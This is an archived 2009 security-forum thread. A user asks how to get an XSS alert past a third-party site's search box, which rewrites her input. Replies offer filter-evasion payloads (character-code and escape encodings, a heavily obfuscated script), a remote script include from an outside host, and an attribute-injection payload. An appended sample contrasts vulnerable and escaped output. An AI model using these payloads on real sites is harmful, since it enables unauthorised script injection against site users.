Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Help! Website with XSS bug changes my input
Posted by: Hanna313
Date: October 02, 2009 05:42PM

Hello guys,

There is a website with a search field at the index page.

When I enter <script>alert("test");</script> in the search field, a pop-up appears which says: "best" instead of "test".


When I enter <script>alert("test123");</script> the website says: "test" instead of "test123"

What does this mean? Isn't this website vulnerable to XSS or something?



Edited 2 time(s). Last edit at 10/05/2009 01:07PM by Hanna313.

Re: Help! Website with XSS bug changes my input
Posted by: Hanna313
Date: October 06, 2009 05:20AM

I found out what happens:

When I enter: <script>alert("test");</script> in the search field, a pop-up shows up saying "best".

What happens is that for some reason the pop-up contains the alternative search word.

Another example: when I search for: <script>alert("doggy");</script> the pop-up shows up saying "dog", because it took the alternative search word.

What can I do to prevent this and make the pop-up say what I enter as input?

Re: Help! Website with XSS bug changes my input
Posted by: PaPPy
Date: October 06, 2009 07:20AM

Maybe try String.fromCharCode

http://www.xssed.com/archive/author=PaPPy/

Re: Help! Website with XSS bug changes my input
Posted by: Gareth Heyes
Date: October 06, 2009 10:05AM

I just couldn't resist.....

<script>alert(String.fromCharCode(116,101,115,116));</script>
<script>alert("\x74\x65\x73\x74");</script>
<script>alert("\u0074\u0065\u0073\u0074");</script>
<script>alert("\164\145\163\164");</script>
<script>alert("&#65364;&#65349;&#65363;&#65364;");</script><!-- slackers needs UTF-8 this won't display correctly :P -->
<script>alert("test");</script>
<script>_=-~-~[],$=-~_,____=_<<_,__=____+~[];________=($-$)[________________=(''+{})[_+$]+(''+{})[$-_]+([].$+'')[$-_]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-_]+(!''+'')[_]+(''+{})[_+$]+({}+'')[$+$]+(''+{})[$-_]+(!''+'')[$-_]][________________];alert(________(________((!''+'')[$-_]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[_]+((!''+''))[$-_]+([].$+'')[$-_]+'\''+''+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+($+$)+(_+$)+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+$)+($+$)+'\\'+(_+_)+($-$)+'\\'+(_+_)+(_)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+($)+'\\'+($-_)+($+$)+(_+_)+'\\'+(_+_)+(_)+'\'')())())</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/06/2009 10:05AM by Gareth Heyes.

Re: Help! Website with XSS bug changes my input
Posted by: Hanna313
Date: October 06, 2009 02:58PM

None of the input is working.

I tried Extraneous open brackets: <<SCRIPT>alert('test');//<</SCRIPT>

and this one first shows one pop-up saying: "best" and the next one saying "test".

So I am improving, but how can I optimize this query so I only get one pop-up saying: "test"?

Re: Help! Website with XSS bug changes my input
Posted by: PaPPy
Date: October 06, 2009 03:00PM

Have you tried including a remote script?

http://www.xssed.com/archive/author=PaPPy/

Re: Help! Website with XSS bug changes my input
Posted by: Hanna313
Date: October 06, 2009 03:09PM

No, I don't think so. How can I do that, and how does that work?

Re: Help! Website with XSS bug changes my input
Posted by: PaPPy
Date: October 06, 2009 03:14PM

<script src=hxxp://ha.ckers.org/xss.js></script>
replace XX with tt

http://www.xssed.com/archive/author=PaPPy/

Re: Help! Website with XSS bug changes my input
Posted by: PaPPy
Date: November 09, 2009 04:16PM

change hxxp to http
hxxps://victim/?UserN=" onmouseover="alert(1)" style="display:block; width:500px; height:500px;


Works in Firefox

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 11/10/2009 09:46PM by sirdarckcat.

Re: Help! Website with XSS bug changes my input
Posted by: mjmjmj
Date: November 10, 2009 09:28PM

Wrong place for reply, PaPPy

http://sla.ckers.org/forum/read.php?2,31936


Please remove MySite link.
Thank you.



Edited 1 time(s). Last edit at 11/10/2009 09:31PM by mjmjmj.

Re: Help! Website with XSS bug changes my input
Posted by: PaPPy
Date: November 11, 2009 06:14AM

K, that was strange. I know I replied to the PM...

http://www.xssed.com/archive/author=PaPPy/
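
Added example (not part of any post in this thread, and not the site's code): the behaviour discussed above comes from a search page that reflects the query and its "alternative search word" without output encoding. The sketch below shows that weak form beside a hardened one. The suggestion table, function names and page markup are assumptions made for illustration.

```javascript
// Added illustration: hypothetical search-results renderer, not the site's code.
// Constructed suggestion table modelling the "alternative search word" behaviour.
const SUGGESTIONS = new Map([["test", "best"], ["doggy", "dog"]]);
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode a value for HTML element content or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Swap each known word for its suggestion (assumed model of the site's logic).
function suggest(query) {
  return query.replace(/[A-Za-z]+/g, (word) => SUGGESTIONS.get(word) || word);
}

// Before: rewriting words changes what the script says but not whether it runs.
function renderVulnerable(query) {
  return `<p>Results for: ${suggest(query)}</p>`;
}

// After: every reflected value is encoded at the point of output.
function renderSafe(query) {
  const q = escapeHtml(query);
  const alt = suggest(query);
  const hint = alt === query ? "" : `<p>Did you mean: ${escapeHtml(alt)}</p>`;
  return `<input name="q" value="${q}"><p>Results for: ${q}</p>${hint}`;
}

// Constructed sample inputs: payloads quoted in the thread plus a plain query.
const SAMPLES = [
  'doggy',
  '<script>alert("test");</script>',
  '<script>alert(String.fromCharCode(116,101,115,116));</script>',
  '" onmouseover="alert(1)',
];

for (const s of SAMPLES) {
  console.log(renderSafe(s));
}
```

Because the encoding happens at output, the way the string inside alert() is written makes no difference: the markup never reaches the HTML parser as a tag or attribute. The attribute case relies on the value being wrapped in double quotes in the template.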
